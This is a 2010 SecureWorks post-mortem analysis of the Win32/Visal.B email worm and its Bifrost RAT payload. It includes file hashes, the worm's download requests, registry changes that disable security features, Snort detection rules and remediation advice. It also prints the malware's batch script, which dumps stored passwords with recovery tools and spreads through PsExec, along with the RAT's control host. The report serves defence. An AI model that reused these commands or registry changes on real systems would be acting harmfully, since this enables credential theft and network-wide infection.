Threat Analysis

Win32/Visal.B Email Worm Post-Mortem Analysis

  • Date: September 22, 2010
  • Author: SecureWorks' Counter Threat Unit™

Summary

On September 9, 2010, the SecureWorks Counter Threat Unit™ (CTU) received reports of a possible worm propagating through email messages. These email messages were reported to have a subject of "Here you have" and contained links to download what appeared to be a PDF (Portable Document Format) file. In actuality, the link would download a Windows Executable file. This file was commonly identified (29/43) by antivirus software vendors as Win32/Visal.B, W32/Imsolk.B, and W32/VBMania. This analysis focuses on a post-mortem analysis of a computer infected with this threat to provide guidance for organizations to identify compromised assets and assess damages.

Email Characteristics

Figure 1 provides an example of what an email sent by this malware might look like.


Figure 1. Example Email.

The link in the message body is a decoy. It actually references a URL hosted on a free webhosting provider in the United Kingdom (UK). The actual URL is for a file with an ".scr" extension typically used by Microsoft Windows Screen Saver programs. An SCR file is a standard Microsoft Window executable.

Sample Characteristics

In Table 1, CTU has identified a single executable file responsible for the initial infection.

MD5 2bde56d8fb2df4438192fb46cd0cc9c9
SHA1 0ba8387faaf158379712f453a16596d2d1c9cfdc
File Size 290816 bytes
File Type PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Table 1. Sample characteristics.

Win32 Visal.B Analysis

CTU analysis of this malware confirmed that its primary purpose was to download additional executables, spread itself to additional computers via email, Windows file shares, domain credentials, and USB autorun, and weaken the overall security posture of the computer.

Win32/Visal.B uses HTTP (Hypertext Transfer Protocol) to attempt to download and execute files from several links hosted on a free webhosting site run by Lycos UK. A typical HTTP request would look like:

 
GET /yahoophoto/ff.iq HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: members.multimania.co.uk
Connection: Keep-Alive

All of the requested URLs end with the .iq suffix. The downloaded executables are saved in the %systemroot% folder (e.g. c:\WINDOWS), with the .iq suffix changed to .exe. CTU analyzed the sample and was able to correlate these results with findings from other security researchers to determine the following files would be downloaded and installed on an infected computer. Table 2 shows the attributes for the downloaded files and additional files installed by the malware.

File Path MD5 Type Size (bytes)
c:\WINDOWS\csrss.exe 2bde56d8fb2df4438192fb46cd0cc9c9 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 290816
c:\WINDOWS\op.exe 37a89021ab1fbe5668c3974abc794bd4 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 39424
c:\WINDOWS\pspv.exe 35861f4ea9a8ecb6c357bdb91b7df804 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 52736
c:\WINDOWS\tryme1.exe 7dac073c9966dec34c523f95f7ec07a9 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 57970
c:\WINDOWS\ff.exe ac5808334832032b0e7df1a2351e207f PE32 executable for MS Windows (GUI) Intel 80386 32-bit 38400
c:\WINDOWS\gc.exe 9b3b1c0db965166319469b2afa6c4f0c PE32 executable for MS Windows (GUI) Intel 80386 32-bit 128000
c:\WINDOWS\ie.exe 21e55f6bbe6bd753faf348dc12e38353 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 44032
c:\WINDOWS\im.exe 4b0f8add6c696cefe2746b6372a09034 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 65536
c:\WINDOWS\m.exe 60e5a03029eac3972550507e96ee4b83 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 51200
c:\WINDOWS\w.exe 862dfc205db452c3c5127b1c721ec1a8 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 48128
c:\WINDOWS\rd.exe f3ca95a762a4101a2cd5789190681a78 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 33280
c:\WINDOWS\re.exe 52f29041d8d151964e904a8d4d0e2677 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 129400
c:\WINDOWS\system32\drivers\etc\hosts fe1f2ddf56663e55ea5a6c48c4660908 Data 44981
c:\WINDOWS\vb.vbs e9552b3f2a5da01805015669fe9b7091 ASCII text, with CRLF line terminators 1728
c:\WINDOWS\system32\SendEmail.dll 6af5491540b35ea502aadde3a358e2c9 PE32 executable for MS Windows (DLL) Intel 80386 32-bit 309992
c:\autorun.inf 323d9773a5dc9efb4623abd1e5c78ce1 ASCII text, with CRLF line terminators 167
c:\open.exe 2bde56d8fb2df4438192fb46cd0cc9c9 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 290816

Table 2. List of files downloaded by Win32/Visal.B.

File Analysis

Most of the downloaded programs have been identified as password recovery tools for specific web browser and email client programs. Developed by NirSoft, a freeware web site operated by an individual software developer, these tools are promoted as utilities to recover lost or forgotten passwords and are not typically considered malicious by themselves. None of these tools analyzed by CTU had the ability to exfiltrate data via the network. However, many of these tools do provide the means to produce output to files. Win32/Visal.B attempts to create and execute a batch file named b.bat. This batch file runs these downloaded programs with a command line option to send the output to a text file. Win32/Visal.B will then attempt to email the output files to an email address hardcoded in the malware.

Contents of b.bat:

 
ff.exe /stext "C:\WINDOWS\ff.dlm"
gc.exe /stext "C:\WINDOWS\gc.dlm"
ie.exe /stext "C:\WINDOWS\ie.dlm"
im.exe /stext "C:\WINDOWS\im.dlm"
op.exe /stext "C:\WINDOWS\op.dlm"
pspv.exe /stext "C:\WINDOWS\pspv.dlm"
rd.exe /stext "C:\WINDOWS\rd.dlm"
w.exe /stext "C:\WINDOWS\w.dlm"
m.exe /stext "C:\WINDOWS\m.dlm"
del *.exe
Copy /b /y SendEmail.dll %SystemRoot%\System32\*.*
regsvr32 %SystemRoot%\System32\SendEmail.dll
re.exe \\* -c \\INFECTEDCOMP\updates\updates.exe

The re.exe tool has been identified as PsExec, a utility distributed by Microsoft SysInternals group used for running applications on remote systems. INFECTEDCOMP is the name of the infected computer and "updates" is the name of a network share that the malware attempts to create and to copy itself. If the logged in user had administrator credentials for the domain, then these permissions could cause the malware to spread to every computer in the domain.

Table 3 maps the observed password recovery utilities downloaded by Win32/Visal.B to the corresponding NirSoft utility.

File Name Tool Name Client Location
ie.exe IE PassView Internet Explorer http://www.nirsoft.net/utils/internet_explorer_password.html
ff.exe PasswordFox Firefox http://www.nirsoft.net/utils/passwordfox.html
op.exe OperaPassView Opera http://www.nirsoft.net/utils/opera_password_recovery.html
pspv.exe Protected Storage PassView Microsoft Protected Storage http://www.nirsoft.net/utils/pspv.html
im.exe MessenPass MSN Messenger/Yahoo Messenger/GoogleTalk/AOL IM/other IM clients http://www.nirsoft.net/utils/mspass.html
m.exe Mail Passview Outlook/Outlook Express/Eudora/Thunderbird/other email clients http://www.nirsoft.net/utils/mailpv.html
w.exe WirelessKeyView WEP/WPA passwords http://www.nirsoft.net/utils/wireless_key.html
gc.exe ChromePass Google Chrome http://www.nirsoft.net/utils/chromepass.html
rd.exe Remote Desktop PassView Microsoft Remote Desktop http://www.nirsoft.net/utils/remote_desktop_password.html

Table 3. Inventory of password recovery utilities.

csrss.exe

This file is a copy of the original Win32/Visal.B executable. The malware may copy itself to several other directories in its attempt to spread via USB autorun and Windows file shares (e.g. c:\open.exe).

Additionally, Win32/Visal.B may create copies of itself in various directories with the pattern " CV 2010.exe".

hosts

Win32/Visal.B attempts to download the hst.iq file, intended as a replacement for the Windows local hosts file. Windows may use the local hosts file to locally resolve domains to IP addresses. This version of the local hosts file attempts to force domains belonging to several antivirus and antimalware products to resolve to bogus IP addresses. If successful, then these tools could be prevented from contacting their update sites to receive updated signatures.

SendEmail.dll

This is an email sending module used by Win32/Visal.B to send emails. This DLL (Dynamic Link Library) is a publicly available module from http://www.4shared.com/file/199140856/ed929f06/SendEmail20.html. The b.bat file created and executed by Win32/Visal.B copies this DLL into the %SystemRoot%\System32 folder and calls regsvr32 to register it.

vb.vbs

This is a VBScript file that is dropped and executed by the malware in an attempt to copy itself to all remote computers within WinNT://Workgroup. CTU analysis of this file shows that it may not function correctly. If it did, it attempts to copy itself to the following paths:

 
		\d\N73.Image12.03.2009.JPG.scr
		\c\N73.Image12.03.2009.JPG.scr
		\New Folder\N73.Image12.03.2009.JPG.scr
		\music\N73.Image12.03.2009.JPG.scr
		\print\N73.Image12.03.2009.JPG.scr
		\E\N73.Image12.03.2009.JPG.scr
		\F\N73.Image12.03.2009.JPG.scr
		\G\N73.Image12.03.2009.JPG.scr
		\H\N73.Image12.03.2009.JPG.scr

autorun.inf

Autorun file used to spread the infection via the USB (Universal Serial Bus) and other removable devices.

tryme1.exe

CTU analysis of this file shows that it is a version of a Remote Access Trojan (RAT) known as Bifrost. This version of Bifrost is currently detected by most (40/42) antivirus vendors. See the 'Bifrost Analysis' later in this paper for more information.

Win32/Visal.B Registry Activity

Win32/Visal.B attempts to change the Windows Shell registry setting to force itself to start at each login.

Key Value Data
HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Explorer.exe C:\WINDOWS\csrss.exe

Table 4. Registry changes for Win32/Visal.B startup.

Win32/Visal.B also attempts to add several registry key entries in an attempt to lower the security posture of an infected computer.

Disable Windows Firewall:

Key Value Data
HKLM\system\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile EnableFirewall 0

Table 5. Registry changes to disable Windows Firewall.

Win32/Visal.B adds the following registry entries to allow SMB (Server Message Block) traffic. SMB, often known as "Windows Networking", provides shared access to files, printers, serial ports, and miscellaneous communications between nodes on a network.

Key Value Data
HKLM\system\ControlSet001\Services\SharedAccess\
Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List
137:UDP 137:UDP:*:Enabled:@xpsp2res.dll,-22001
HKLM\system\ControlSet001\Services\SharedAccess\
Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List
138:UDP 138:UDP:*:Enabled:@xpsp2res.dll,-22002
HKLM\system\ControlSet001\Services\SharedAccess\
Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List
139:TCP 139:TCP:*:Enabled:@xpsp2res.dll,-22004
HKLM\system\ControlSet001\Services\SharedAccess\
Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List
445:TCP 445:TCP:*:Enabled:@xpsp2res.dll,-22005
HKLM\system\ControlSet001\Services\SharedAccess\
Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List
137:UDP 137:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22001
HKLM\system\ControlSet001\Services\SharedAccess\
Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List
138:UDP 138:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22002
HKLM\system\ControlSet001\Services\SharedAccess\
Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List
139:TCP 139:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22004
HKLM\system\ControlSet001\Services\SharedAccess\
Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List
445:TCP 445:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22005

Table 6. Registry additions to allow SMB traffic.

With these registry additions, Win32/Visal.B instructs Windows Explorer to not show hidden system files:

Key Value Data
HKCU\NTUSER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden 2
HKCU\NTUSER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced SuperHidden 0
HKCU\NTUSER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ShowSuperHidden 0

Table 7. Registry additions to hide system files.

Turn off Outlook security warning dialog box:

Key Value Data
HKLM\software\Microsoft\Office\12.0\Outlook\Security ObjectModelGuard 2

Table 8. Registry additions to disable security warnings.

Disable Windows User Account Control (UAC):

Key Value Data
HKLM\software\Microsoft\Windows\CurrentVersion\policies\system EnableLUA 0
HKLM\software\Microsoft\Windows\CurrentVersion\policies\system EnableVirtualization 0
HKLM\software\Microsoft\Windows\CurrentVersion\policies\system PromptOnSecureDesktop 0

Table 9. Registry additions to disable Windows UAC.

Attempt to create a network share named "updated" to allow the malware to spread:

Key Value Data
HKLM\system\ControlSet001\Services\lanmanserver\Shares updates CSCFlags=0[0x00]MaxUses=100[0x00]Path=
C:\WINDOWS\system[0x00]Permissions=0[0x00]Remark=
Public share for update.[0x00]Type=0[0x00][0x00]

Table 10. Registry changes to create a network share.

Win32/Visal.B adds numerous values within the software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ registry key. For example:

Key Value Data
HKLM\software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\00hoeav.com Debugger csrss.exe

Table 11. Example of a registry addition intended to inhibit security software.

This additional key causes a copy of the malware to be started instead of the application listed in the registry key (in this example, 00hoeav.com). Win32/Visal.B uses this technique to prevent program names matching various security applications from executing. Appendix A contains the full list of targeted applications.

Additional Win32/Visal.B Behavior

The Win32/Visal.B malware attempts to terminate the following processes if they are currently running:

  • Usbguard.exe
  • CPE17AntiAutoruna.exe
  • outlook.exe

It will also attempt to delete files in these directories:

 
  • C:\Program Files\USB Disk Security\
  • D:\Program Files\USB Disk Security\

Win32/Visal.B attempts to stop and then disable several Windows services belonging to antivirus and other host-based security products. See Appendix B for the complete list.

Visal Email Worm History

The CTU has seen evidence that there was at least one earlier instance of this malware campaign. CTU was able to find another piece of malware that was executed in its TRUMAN automated malware analysis system on August 5, 2010 that exhibited nearly identical behavior. Antivirus identification (40/43) of this malware identified it as Win32/Visal.A and Imsolk.

The primary difference of this version of the malware is this it uses a different web hosting account. Win32/Visal.A attempted to download its secondary payloads from an account named "iqreporters".

 
GET /iqreporters/ie.iq HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: members.multimania.co.uk
Connection: Keep-Alive

Bifrost Analysis

The Bifrost RAT (Remote Access Trojan) downloaded by Win32/Visal.B provides an attacker with the ability to remotely view and control several aspects of an infected system, including:

  • Browse filesystem
  • Create and remove directories
  • Search for files by pattern
  • Upload and download files
  • Execute files on remote system
  • View and kill running processes
  • Capture screenshots of the infected computer's desktop
  • Log user keystrokes
  • View and modify the Windows Registry
  • Manipulate an attached webcam
  • Open a remote shell to the infected computer to run additional commands
 

As is common with RATs, Bifrost uses a GUI that runs on an attacker's computer to view and manage infected computers. Figure 2 shows an example of a Bifrost management GUI (Graphical User Interface) with an infected computer connected.

Figure 2. Bifrost Management GUI.

Figure 3 shows the File Manager capability:

Figure 3. Bifrost File Manager.

This version of Bifrost also includes an additional module designed for stealing passwords from the Microsoft Protected Storage (Protected Storage provides applications with an interface to store user data that must be kept secure or free from modification), several email clients, and for stealing license keys from popular computer software packages and games.

Bifrost File Behavior

The Bifrost sample installed by Win32/Visal.B was observed making the following file changes:

File Path MD5 File Type Size (Bytes)
c:\Documents and Settings\owner\Application Data\addons.dat 902591674a0e7d0143418aab50977ff4 data 25292
c:\WINDOWS\system32\systems\logg.dat <variable> data <variable>
c:\WINDOWS\system32\systems\svchosts.exe 7dac073c9966dec34c523f95f7ec07a9 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 57970

Table 12. Registry additions made by the Bifrost malware.

addons.dat

An encrypted module for Bifrost that implements the password and software license key stealing capability mentioned earlier in this section.

logg.dat

The log file Bifrost uses to store keystrokes collected by its keylogger capability. The keylogger functionality in this version of Bifrost was enabled by default.

svchosts.exe

The Bifrost trojan copies itself to this location the first time it executes.

Bifrost Registry Behavior

Bifrost makes the following registry changes:

Key MD5 Value Data
HKCU\Software\Bifrost klg [0x01]
HKCU\Software\Bifrost plg1

[0xea]D[0xdc][0x02][0xa3]'[0xd7]_[0x11][0xad][0xb9][0x07][0xda][0xf2]5[0x03]*5[0x8e]X
[0x1b][0x0e][0x11][0x94][0xd4][0xf9][0x12][0x1b][0x1a]Z[0xa4][0x81][0xfe]qh[0xa3][0xd4]
[0xea][0xb4][0xa7])[0xb3]_[0xa4]>[0xa9]#[0x8a][0x85]i[0x01]u[0x9e][0x9b]O[0x1e][0x8b]sC
[0x16]a[0xca][0xae][0x05][0xea]Iv[0xf7]5-[0xf3]!h[0x12]-[0x84][0x01]A[0x0f][0xf6]n[0x09]!b
QY[0xe0][0xef]!([0xc5][0xf3],[0xce][0xf6]1Wju[0xc6]rU[0xd5][0xfd][0xe3][0x11][0xcf][0x02]
*?[0xeb]\[0xdb][0xfe]\=[0xc8][0x0d]Sg[0xf7][0x88]'[0x09]k[0x98][0xf0]7[0xdd][0x00][0x93]B
[0xa5]y>6[0x86][0xbe][0xb2][[0x99][0xd8]E[0x12][0x96]B[0xb7]a[0x11],[0xe7][0x18][0x95]
[0xd1][0x97]&[0x05]D[0xba][0xe3][0xe1]s[0x99][0xed][0xee][0x1d][0xe9][0xe5]Dc[0xb3]
[0xc3][0xfd][0x87]^[0x97]N[0xe8]8[0xe8][0xfe]P[0xd8][0xb1]R[0x89][0xf9]5d[0xb2]Du=
[0x12][0xae][0xe8][0xb3][0xdb][0xeb][0xd0][0xa8][0xc5][0xef]?[0xd2][0xcb][0xa2]WsL
[0xd8][0xc2]8#[0x82][0xd4][0x04][0xd1]90V[0xd5]!g[0x93][0x89]*[0xfe]D[0x8d][0xfd]
[0xc3][0xce][0xef][0x8f]4[0xb1]([0xd9][0x0c]4)[0xce]Q^[0xe3]M4[0xfb][0xbe]t[0xcd]@6:
[0xd8]j[0x8f]A

HKCU\software\Bifrost nck [0xe8][0x12][0xec]'[0xa4][0x05][0xc9]P[0x06][0xc3][0xcd]t[0xfa][0x93][g
software\Microsoft\Active Setup\Installed Components\{9D71D88C-C598-4935-C5D1-43AA4DB90836} stubpath C:\WINDOWS\system32\systems\svchosts.exe s[0x00]

Table 13. Registry additions made by the Bifrost malware.

Bifrost uses the stubpath entry to establish permanence on the infected computer. Programs listed under the Active Setup key are automatically executed at login. If the user initially running the Bifrost trojan has Administrator privileges, then this key is written under HKEY_LOCAL_MACHINE and Bifrost will start up for all users. If the initial user does not have Administrator privileges, then this key is written under HKEY_CURRENT_USER and only start up when that user logs in.

Bifrost Network Behavior

Bifrost uses a custom protocol to communicate with the GUI on the attacker's computer. This protocol is TCP-based and the remote host and port number can be custom configured for each build of the malware. The version dropped by Win32/Visal.B was configured to connect to the tarekbinziad.no-ip.biz domain on TCP port 2003. CTU observed this domain resolving to the IP address 92.41.61.61 before the domain was taken offline by the dynamic DNS provider.

Recent versions of Bifrost support the use of a TOR plugin and TOR hidden services to attempt to hide the remote server. TOR is free software used to communicate anonymously on the Internet. This version of Bifrost supports the TOR plugin but did not include it.

Bifrost Process Behavior

Bifrost supports various options and plugins for stealth, including rootkit capabilities. This build of Bifrost did not utilize these rootkit capabilities. Its primary stealth mechanism is to create an instance of an Internet Explorer process that is not visible, and then inject its primary code into that process. While there is no visible IE window, it will still be present in the Task Manager (see Figure 4).

Figure 4. Bifrost IE process in task list.

The powerful capabilities of the Bifrost trojan make it a significant threat on a network, as it allows an attacker almost full access to a compromised computer and the information stored within. A factor that may mitigate the threat in this instance is that the Bifrost GUI was not built to scale to handle a large number of infected computers. In addition, the attacker using a mobile broadband connection may have caused his bandwidth to become saturated due to a potentially large number of infected hosts attempting to connect to the control GUI. This constraint may have reduced the number of infected computers successfully connecting to the remote host and exfiltrating stolen data.

Recommendations

Detection

CTU recommends monitoring networks for activity indicative of Win32/Visal.B infection. There are various stages of the infection process where detection is possible.

Initial HTTP download request

The emails sent by Win32/Visal.B attempt to obfuscate the URL hosting the malware by displaying one of the following URLs in the HTML markup:

 
www[dot]sharedocuments[dot]com/library/PDF_Document21.025542010.pdf
www[dot]sharemovies[dot]com/library/SEX21.025542010.wmv

However, the hyperlink actually points to this URL:

 
http://members[dot]multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr

Network IPS/IDS and/or web proxies should be configured to detect and/or block attempts to download these URLs. The following Snort rules can be used to detect attempts to download either the actual URL hosting the malware, or one of the decoy URLs:

 
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP Request for Visal.B"; flow:established,to_server; content:"GET|20|"; depth:4; nocase; content:"/library/SEX21.025542010.wmv|20|HTTP/1."; distance:0; sid:xxx;)
 
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP Request for Visal.B"; flow:established,to_server; content:"GET|20|"; depth:4; nocase; content:"/yahoophoto/PDF_Document21_025542010_pdf.scr|20|HTTP/1."; distance:0; nocase; sid:xxx;)
 
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP Request for Visal.B"; flow:established,to_server; content:"GET|20|"; depth:4; nocase; content:"/library/PDF_Document21.025542010.pdf|20|HTTP/1."; distance:0; nocase; sid:xxx;)

Post-Infection Malware Download

Win32/Visal.B attempts to download multiple executable files from the Internet. These requests have unique attributes that can be easily detected. The following Snort rule can be used:

 
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Visal.B Email Worm Malware Download"; flow:established,to_server; content:"GET|20|"; depth:4; nocase; content:".iq|20|HTTP/1.1"; distance:1; content:"|0D 0A|User-Agent|3A 20|Mozilla|2F|4.0|20 28|compatible|3B 20|Win32|3B 20|WinHttp.WinHttpRequest.5|29|"; distance:0; content:"|0D 0A|Accept|3A 20|*/*"; content:!"Referer|3A|"; nocase; content:!"|0D 0A|Accept-Language|3A|"; nocase; content:!"|0D 0A|Accept-Encoding|3A|"; nocase; content:!"|0D 0A|Accept-Charset|3A|"; nocase; content:!"|0D 0A|Keep-Alive|3A|"; nocase; sid:xxx;)
 

Bifrost Phone Home

The Bifrost RAT installed by Win32/Visal.B attempts to phone home to a single host that is hardcoded in the malware. Organizations should monitor DNS activity for requests for the tarekbinziad.no-ip.biz domain that may indicate the system has been compromised with Win32/Visal.B and the Bifrost RAT. While that domain has been shut down, organizations with the ability to monitor their firewall logs can search for connection attempts to the IP address 92.41.61.61 on TCP/2003 to identify compromised systems.

Remediation

Win32/Visal.B can significantly alter the security posture of a compromised system, even if the malware or the system is unsuccessful in downloading malware files from the Internet. Given the magnitude of the registry and file changes made to the system in addition to any additional malware installed, CTU recommends that compromised systems be formatted and the Operating System and applications reinstalled from known-good media.

Organizations should also consider the potential compromise of any stored credentials for email and HTTP accounts and initiate appropriate remediation steps based on their risk calculations.

Prevention

In addition to network-based monitoring and detection, CTU recommends the following steps to help protect your organization from this and future threats.

  • Avoid clicking links in email messages.

    Advise users to not click links in email messages, especially in messages from unknown or untrusted sources. Note that users cannot determine if an email link is safe simply by examining the link. Web servers can be configured to redirect the user or deliver benign content besides that indicated by the filename extension used in the link. Verify links and attachments from trusted sources before opening them.

  • Disable AutoRun.

    If feasible, disable AutoRun functionality according to the instructions in Microsoft Knowledge Base article KB967715, available here:

    http://support.microsoft.com/kb/967715

  • Limit user privileges.

    Do not log in as a privileged or administrative user to perform routine computer tasks. The WMI (Windows Management Instrumentation) and psexec vectors used by this worm generally require administrator rights to work according to the attacker's design.

  • Secure WMI.

    A technical article describing how to secure WMI (Windows Management Instrumentation) can be found on the Microsoft Developer Network, available at:
    http://msdn.microsoft.com/en-us/library/aa392291%28VS.85%29.aspx

  • Update host and gateway antivirus product signatures.

    Several corporate antivirus engines detect some of the payloads associated with this threat. SecureWorks has provided samples of all related malware files to all major antivirus vendors. If antivirus signatures are not yet available, monitor or contact your antivirus vendor(s) for signature update availability.

  • Think twice before allowing your web browser to remember your passwords for you.

    This worm uses legitimate password recovery and revealer applications as well as a backdoor capable of stealing passwords and digital certificates from web browsers. Malware has proven that default settings for password security in modern web browsers are ineffective. Additional settings, such as setting a master password, are needed to help mitigate this risk. Optionally, users may want to consider using password management programs instead of built-in browser functionality.
 

Appendix A. List of security applications targeted by Win32/Visal.B

00hoeav.com
0w.com
360rpt.ExE
360safe.ExE
360safebox.ExE
360tray.ExE
6.bat
6fnlpetp.exe
6x8be16.cmd
BIOSREad.exe
BdSurvey.exe
CCenter.ExE
CEmRep.ExE
CMain.ExE
CaVCmd.exe
CaVCtx.exe
CaVRep.exe
CaVRid.exe
CaVSCons.ExE
CaVSubmit.ExE
CavEmSrv.ExE
CavMUd.ExE
CavQ.ExE
CavSn.ExE
CavSub.ExE
CavUMaS.ExE
CavUserUpd.ExE
CavaUd.ExE
Cavapp.ExE
Cavmr.ExE
Cavoar.ExE
Cavvl.ExE
EMdISK.exe
FPWin.exe
FPaVServer.exe
FProttray.exe
FRW.ExE
FileKan.exe
FrameworkService.exe
FrzState2k.exe
GFUpd.ExE
GetSI.dll
GuardField.ExE
Hijackthis.ExE
ICLOad95.ExE
ICLOadNt.ExE
ICMON.ExE
ICSUPP95.ExE
ICSUPPNt.ExE
IEShow.exe
IFaCE.ExE
IceSword.ExE
Identity.exe
InstLsp.ExE
InstallCaVS.ExE
Iparmor.ExE
KPfwSvc.ExE
KRegEx.ExE
KVSrvxP.ExE
KVWSC.ExE
KaSaRP.ExE
KaVPFW.ExE
KeyMgr.exe
MSGrc32.vbs
McShield.exe
McVSEscn.exe
Mcdetect.exe
Mctray.exe
Mmsk.ExE
MooLive.exe
NaVW32.ExE
NaVaPW32.ExE
Navapsvc.ExE
OnaccessInstaller.ExE
PFW.ExE
PSHost.exe
PaVSRV51.ExE
Pagent.exe
Pagentwd.exe
PavFnSvr.exe
PavReport.exe
PsCtrlS.exe
PsImSvc.exe
QQdoctor.ExE
QtnMaint.exe
RStray.ExE
RaV.ExE
RaVtRaY.ExE
RavStub.ExE
Ravservice.ExE
Rfwstub.ExE
Runiep.ExE
SCVHOSt.exe
SCVHSOt.exe
SCVVHOSt.exe
SCVVHSOt.exe
SOLOCFG.exe
SOLOLItE.exe
SOLOSCaN.exe
SOLOSENt.exe
SREngLdr.ExE
SendLogs.exe
Socksa.ex
Sphinx.exe
Spybotsd.exe
UPSdbMaker.ExE
UUpd.ExE
UdaterUI.exe
VPC32.ExE
VPtRaY.ExE
VSECOMR.ExE
VSHWIN32.ExE
VSStat.ExE
Vba32ECM.exe
Vba32PP3.exe
Vba32Qtn.exe
Vba32act.exe
Vba32arkit.exe
Vba32ifs.exe
VetMsg.exe
Visthaux.exe
VstskMgr.exe
WEBPROxY.ExE
WEBSCaNx.ExE
WOPtILItIES.ExE
WinGrc32.dll
WrCtrl.exe
Wradmin.exe
_aVP32.ExE
_aVPCC.ExE
_aVPM.ExE
a2cmd.ExE
a2free.ExE
a2service.ExE
a2upd.ExE
aNtIaRP.ExE
aNtS.ExE
aPVxdWIN.ExE
aVCONSOL.ExE
aVENGINE.ExE
aVP32.ExE
aVPCC.ExE
aVPM.ExE
abk.bat
adobe Gamma Loader.exe
algsrvs.exe
algssl.exe
angry.bat
anti-trojan.exe
antihost.exe
apu-0607g.xml
apu.stt
arSwp.ExE
ashEnhcd.exe
ashLogV.exe
ashMaiSv.exe
ashPopWz.exe
ashQuick.exe
ashServ.exe
ashSkPcc.exe
ashUpd.exe
ashWebSv.exe
ashdisp.exe
ast.ExE
aswBoot.exe
aswRegSvr.exe
aswUpdSv.exe
autoRun.ExE
autoRunKiller.ExE
autorun.bin
autorun.ini
autorun.reg
autorun.txt
autorun.wsh
autoruns.exe
autorunsc.exe
avMonitor.ExE
avadmin.exe
avastSS.exe
avcenter.exe
avciman.exe
avconfig.exe
avgamsvr.exe
avgas.exe
avgcc.exe
avgcc32.exe
avgemc.exe
avginet.exe
avgnt.exe
avgrssvc.exe
avgrsx.exe
avgscan.exe
avgscanx.exe
avgserv.exe
avguard.exe
avgupsvc.exe
avgw.exe
avgwdsvc.exe
avltd.exe
avmailc.exe
avnotify.exe
avp.com
avp.exe
avscan.exe
avzkrnl.dll
bad1.exe
bad2.exe
bad3.exe
bdagent.exe
bdsubwiz.exe
blackd.exe
blackice.exe
caiss.exe
caissdt.exe
catcache.dat
cauninst.exe
cavasm.ExE
cavse.ExE
ckahcomm.dll
ckahrule.dll
ckahum.dll
cleaner.exe
cleaner3.exe
clldr.dll
copy.exe
curidsbase.kdz
dF5Serv.exe
destrukto.vbs
diffs.dll
drvins32.exe
drwadins.exe
drweb32w.exe
drweb386.exe
drwebscd.exe
drwebupw.exe
drwebwcl.exe
drwreg.exe
e.cmd
e9ehn1m8.com
edb.chk
egui.exe
ekrn.exe
f0.cmd
flashy.exe
fpscan.exe
fptrayproc.exe
fs6519.dll.vbs
fssf.exe
fssync.dll
fun.xls.exe
g2pfnid.com
guard.exe
guardgui.exe
guardxkickoff.exe
guardxkickoff_x64.exe
guardxservice.exe
guardxup.exe
h3.bat
hookinst.exe
host.exe
i.bat
iSafInst.exe
iSafe.exe
iamapp.exe
iamserv.exe
iefqwp.cmd
ij.bat
kav.bav
kav32.ExE
kavbase.kdl
kavstart.ExE
ker.vbs
killVBS.vbs
kissvc.ExE
kl1.sys
klavemu.kdl
klbg.cat
klbg.sys
klif.cat
klif.sys
klim5.sys
kmailmon.ExE
kwatch.ExE
licmgr.ex
licreg.exe
lky.exe
lockdown2000.exe
m2nl.bat
mbam.exe
mcagent.exe
mcappins.exe
mcaupdate.exe
mcdash.exe
mcinfo.exe
mcinsupd.exe
mcmnhdlr.exe
mcregwiz.exe
mcupdmgr.exe
mcupdui.exe
mcvsftsn.exe
mcvsmap.exe
mghtml.exe
msdos.pif
msfir80.exe
msime80.exe
msizap.exe
msmsgs.exe
msvcm80.dll
msvcp80.dll
msvcr71.dll
msvcr80.dll
mzvkbd.dll
mzvkbd3.dll
naPrdMgr.exe
naiavfin.exe
netcfg.dll
new folder.exe
njibyekk.com
nod32.exe
nod32krn.exe
nod32kui.exe
oasclnt.exe
olb1iimw.bat
pavprsrv.exe
pavsched.exe
pavtest.exe
pctsSvc.exe
pctsauxs.exe
pctstray.exe
preupd.exe
prloader.dll
procexp.exe
psctrlc.exe
pskmssvc.exe
ravmon.exe
rcukd.cmd
reload.exe
rescue32.exe
rescuecd.zip
rfwProxy.ExE
rfwmain.ExE
rfwsrv.ExE
rose.exe
safeboxtray.ExE
sal.xls.exe
sched.exe
scvhosts.exe
scvvhosts.exe
seccenter.exe
session.exe
shstat.exe
spidercpl.exe
spiderml.exe
spidernt.exe
spiderui.exe
spml_set.exe
